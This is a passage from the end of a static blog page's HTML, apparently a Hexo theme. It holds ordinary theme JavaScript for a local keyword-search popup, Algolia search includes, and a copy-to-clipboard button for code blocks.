              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
